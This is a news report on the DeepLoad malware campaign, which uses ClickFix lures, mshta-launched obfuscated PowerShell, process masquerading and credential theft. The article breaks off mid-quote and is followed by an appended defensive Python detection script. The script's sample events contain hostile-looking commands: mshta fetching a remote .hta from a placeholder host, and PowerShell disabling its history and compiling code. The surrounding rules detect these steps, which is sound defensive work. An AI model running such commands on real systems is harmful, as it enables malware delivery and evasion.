DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials
https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html
Publish Date: 2026-03-30 11:47:00
Source Domain: thehackernews.com
A new campaign has leveraged the ClickFix social engineering tactic as a way to distribute a previously undocumented malware loader referred to as DeepLoad.
“It likely uses AI-assisted obfuscation and process injection to evade static scanning, while credential theft starts immediately and captures passwords and sessions even if the primary loader is blocked,” ReliaQuest researchers Thassanai McCabe and Andrew Currie said in a report shared with The Hacker News.
The starting point of the attack chain is a ClickFix lure that tricks users into pasting a PowerShell command into the Windows Run dialog and executing it, under the pretext of fixing a non-existent issue. That command, in turn, uses “mshta.exe,” a legitimate Windows utility, to download and run an obfuscated PowerShell loader.
The loader, for its part, has been found to conceal its actual functionality among meaningless variable assignments, likely in an attempt to deceive security tools. It’s assessed that the threat actors relied on an artificial intelligence (AI) tool to develop the obfuscation layer.
DeepLoad makes deliberate efforts to blend in with regular Windows activity and fly under the radar. This includes hiding the payload within an executable named “LockAppHost.exe,” the name of a legitimate Windows process that manages the lock screen.
In addition, the malware covers up its own tracks by disabling PowerShell command history and invoking native Windows core functions directly instead of relying on PowerShell’s built-in commands to launch processes and modify memory. In doing so, it bypasses common monitoring hooks that keep tabs on PowerShell-based activity.
“To evade file-based detection, DeepLoad generates a secondary component on the fly by using the built-in PowerShell feature Add-Type, which compiles and runs code written in C#,” ReliaQuest said. “This produces a temporary Dynamic Link Library (DLL) file dropped into the…
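As an added illustration from the defender's side (not code from the report or from ReliaQuest), the triage below scores constructed Sysmon-style process-creation events against the chain described above: mshta.exe launched from the Run dialog with remote content, PowerShell spawned by mshta, PowerShell command history disabled, Add-Type compilation, and LockAppHost.exe running outside its expected directory. The history-disabling cmdlet, the legitimate LockAppHost.exe location and all sample events are assumptions, not details taken from the report.

```python
"""Triage of process-creation telemetry for the DeepLoad chain (added example)."""
import re

# Constructed sample telemetry (not from the report): each dict mimics a
# Sysmon Event ID 1 record with parent image name, image path and command line.
SAMPLE_EVENTS = [
    {"pid": 4100, "parent": "explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/fix.hta"},
    {"pid": 4120, "parent": "mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c Set-PSReadLineOption -HistorySaveStyle SaveNothing; "
            "Add-Type -TypeDefinition $src"},
    {"pid": 4150, "parent": "powershell.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\LockAppHost.exe", "cmd": "LockAppHost.exe"},
    {"pid": 900, "parent": "explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe"},
]

# Assumed legitimate location prefix of the lock-screen host (lower-cased for comparison).
LEGIT_LOCKAPP_PREFIX = r"c:\windows\systemapps\microsoft.lockapp_"


def flag_event(ev):
    """Return the list of rule names this event matches (empty list if benign)."""
    reasons = []
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmd"].lower()
    name = image.rsplit("\\", 1)[-1]
    # ClickFix stage: Run dialog commands are children of explorer.exe; mshta fetching a URL.
    if name == "mshta.exe" and parent == "explorer.exe" and re.search(r"https?://", cmd):
        reasons.append("mshta launched from Run dialog with remote content")
    # Loader stage: PowerShell spawned by mshta is rare in normal activity.
    if name == "powershell.exe" and parent == "mshta.exe":
        reasons.append("powershell spawned by mshta")
    # Anti-forensics: PSReadLine history turned off (assumed mechanism).
    if "historysavestyle" in cmd and "savenothing" in cmd:
        reasons.append("PowerShell command history disabled")
    # On-the-fly C# compilation producing a temporary DLL.
    if "add-type" in cmd:
        reasons.append("Add-Type compilation")
    # Masquerading: LockAppHost.exe outside its expected SystemApps directory.
    if name == "lockapphost.exe" and not image.startswith(LEGIT_LOCKAPP_PREFIX):
        reasons.append("LockAppHost.exe running from unexpected path")
    return reasons


def triage(events):
    """Map pid -> matched rules for every event that triggered at least one rule."""
    return {ev["pid"]: r for ev in events if (r := flag_event(ev))}


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

Correlating the hits by parent/child pid (mshta -> powershell -> renamed LockAppHost.exe) turns three medium-confidence signals into one high-confidence chain alert.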